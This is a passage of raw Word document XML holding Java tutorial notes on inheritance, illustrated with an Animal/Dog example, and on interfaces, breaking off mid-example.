          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A6EE44"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1A0F6E43"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5D05C5B9"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e an object of the Dog class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F2BB0"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og myDog = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBE4D7"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146E725"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ccess inherited properties and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E4485"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Dog.name = "Buddy"; // Inherited from Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C376023"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Dog.breed = "Golden Retriever";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FCC92"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307DD2C"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ccess inherited methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCBC8C"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Dog.eat();  // Output: Buddy is eating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A1F5A"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Dog.sleep(); // Output: Buddy is sleeping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B18707"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295EE64"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ccess child class specific method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE71372"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Dog.bark();  // Output: Buddy is barking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1E132"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F891169"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86D9F3F" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4082ECE8" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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Dog class </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inherits</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the name, eat(), and sleep() methods from the Animal class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C762E2" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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also adds a new property (breed) and a method (bark()), which are specific to the Dog class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712979CD" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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the myDog object calls eat(), sleep(), and bark(), it uses both inherited and newly defined methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32977F" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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p w14:paraId="32EABDE0"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uddy is eating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728312F0"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uddy is sleeping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A75DA"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uddy is barking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07FEFD" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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5E249CB">
          <v:rect id="_x0000_i1374" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE2518" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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Benefits of Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22720D38" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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de Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Child classes can reuse the methods and fields defined in the parent class, reducing the need to write duplicate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71EECB" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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tensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can add new functionality in child classes without modifying the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2A63C" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ierarchical Structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inheritance helps model relationships in the real world, such as "Dog is an Animal" or "Car is a Vehicle".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57100005" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 Overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Child classes can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods to provide their own implementation while still maintaining the same method signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDB0D0" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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535B622">
          <v:rect id="_x0000_i1375" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4CBBE" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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Important Points About Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589909FE" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ingle Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with classes, but a class can inherit from only one parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02214A8A" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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structor Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Constructors are not inherited. However, a child class can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the constructor of the parent class using super().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52354DDF" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Access Modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Private members of the parent class are not inherited by the child class. However, protected and public members are accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F957A0" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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uper Keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to access the parent class methods, constructors, and variables from the child class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A39062" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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898F179">
          <v:rect id="_x0000_i1376" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6D1B9" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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eal-World Analogy for Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808830B" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614"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ink of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>family heritage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For example, if a child inherits certain features from their parents, they may have the same eye color, height, or hair color. However, the child can also develop their own unique traits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599818DB" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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rent Class</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Animal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (provides common behaviors like eat() and sleep()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE7DEC" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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hild Class</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Dog</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (inherits from Animal but also has its own unique behavior, like bark()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C9999" w14:textId="6DE8B56C" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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205166FD">
          <v:rect id="_x0000_i1377" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA6F66" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc196307606"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the interface in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="3F086CB3" w14:textId="6CAEC30B" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a reference type, similar to a class, that can contain only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstract methods</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default methods</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static method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constants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (public, static, final variables). It cannot have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance fields</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constructors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EEF29"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terfaces define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contract</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that classes must follow. Any class that implements an interface must provide implementations for all the methods declared by the interface (unless the class is abstract).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669D375"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interfaces are used to achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstraction</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multiple inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (through interface implementation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E207FF" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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Points about Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5988F8" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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bstract Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces can contain abstract methods (methods without a body). The implementing class must provide a body for these methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE868F0" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ault Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Starting from Java 8, interfaces can have default methods with a body, providing a default implementation that can be overridden by the implementing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E86AB" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces can have static methods, which are associated with the interface itself, not with any instance of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5132E6" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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stants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: All variables declared in an interface are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public, static, and final, i.e., constants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A8728" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ultiple Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class can implement multiple interfaces, allowing a form of multiple inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BFEF0F" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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C57004F">
          <v:rect id="_x0000_i1378" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42F102" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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yntax of an Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2924BC69"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015CC417"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bstract method (does not have a body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB65D1"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sound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDFD5D" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4D9015"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Default method (with a body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D516B"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efault void sleep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C493CE6"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The animal is sleeping");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B24B41"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2FDAE4A" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09143723"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onstant variable (public, static, final by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793DCB4"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age = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86DEED"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722F568" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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Implementing an Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D38F2"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class implements an interface by providing concrete implementations for all abstract methods of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE9585"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Dog implements Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB07F3"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oviding implementation for the abstract method</w:t>
